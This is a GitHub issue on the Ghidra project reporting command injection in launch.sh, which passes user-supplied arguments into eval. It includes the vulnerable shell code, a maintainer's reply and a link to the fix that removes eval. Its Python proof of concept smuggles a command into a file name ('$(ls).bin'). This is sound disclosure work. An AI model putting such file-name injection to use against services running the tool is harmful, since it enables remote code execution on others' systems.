Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

Command injection in launch.sh #4869

Closed
attilaszia opened this issue Jan 4, 2023 · 1 comment · Fixed by #4872
Closed

Command injection in launch.sh #4869

attilaszia opened this issue Jan 4, 2023 · 1 comment · Fixed by #4872
Assignees
@ryanmkurtz
Labels
Feature: Launch Feature: Platform/Linux Feature: Platform/macOS Status: Internal This is being tracked internally by the Ghidra team Type: Security
Milestone
10.2.3

Comments

@attilaszia
Copy link

Describe the bug
/Ghidra/RuntimeScripts/Linux/support/launch.sh passes user provided input into eval. This results in straightforward command injection.

There are a couple of security SaaS's that use analyzeHeadless as part of a service, so this is a pretty surprising RCE on natural-looking invocations.

https://github.com/NationalSecurityAgency/ghidra/blob/master/Ghidra/RuntimeScripts/Linux/support/launch.sh#L192

if [ "${BACKGROUND}" = true ]; then
	eval "\"${JAVA_CMD}\" ${VMARG_LIST} -showversion -cp \"${CPATH}\" ghidra.Ghidra ${CLASSNAME} ${ARGS[@]}" &>/dev/null &
	
	# If our process dies immediately, output something so the user knows to run in debug mode.
	# Otherwise they'll never see any error output from background mode.
	# Doing a kill -0 sends a no-op signal, which can be used to see if the process is still alive.
	PID=$!
	sleep 1
	if ! kill -0 ${PID} &>/dev/null; then
		echo "Exited with error.  Run in foreground (fg) mode for more details."
		exit 1
	fi
	exit 0
else
	eval "(set -o noglob; \"${JAVA_CMD}\" ${VMARG_LIST} -showversion -cp \"${CPATH}\" ghidra.Ghidra ${CLASSNAME} ${ARGS[@]})"
	exit $?
fi

To Reproduce

import subprocess

with open('/bin/bash', 'rb') as f:
    data = f.read()

with open('./$(ls).bin', 'wb') as g:
    g.write(data)

command = ['analyzeHeadless','./','poc','-import','./$(ls).bin']
subprocess.call(command, shell=False)
@ryanmkurtz ryanmkurtz self-assigned this Jan 4, 2023
@ryanmkurtz
Copy link
Collaborator

I think eval was introduced to handle spaces in the VMARGS variable. I'm currently exploring alternative implementations that don't use eval, but suggestions are welcome for that VMARGS/spaces issue.

@ryanmkurtz ryanmkurtz mentioned this issue Jan 5, 2023
Merged
@ryanmkurtz ryanmkurtz linked a pull request Jan 5, 2023 that will close this issue
Removing eval usage from launch.sh #4872
Merged
@ryanmkurtz ryanmkurtz added Status: Internal This is being tracked internally by the Ghidra team and removed Status: Triage Information is being gathered labels Jan 6, 2023
@ryanmkurtz ryanmkurtz added this to the 10.2.3 milestone Jan 10, 2023
# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees

@ryanmkurtz ryanmkurtz

Labels
Feature: Launch Feature: Platform/Linux Feature: Platform/macOS Status: Internal This is being tracked internally by the Ghidra team Type: Security
Projects
None yet
Milestone
10.2.3
Development

Successfully merging a pull request may close this issue.

Removing eval usage from launch.sh ryanmkurtz/ghidra
2 participants
@ryanmkurtz @attilaszia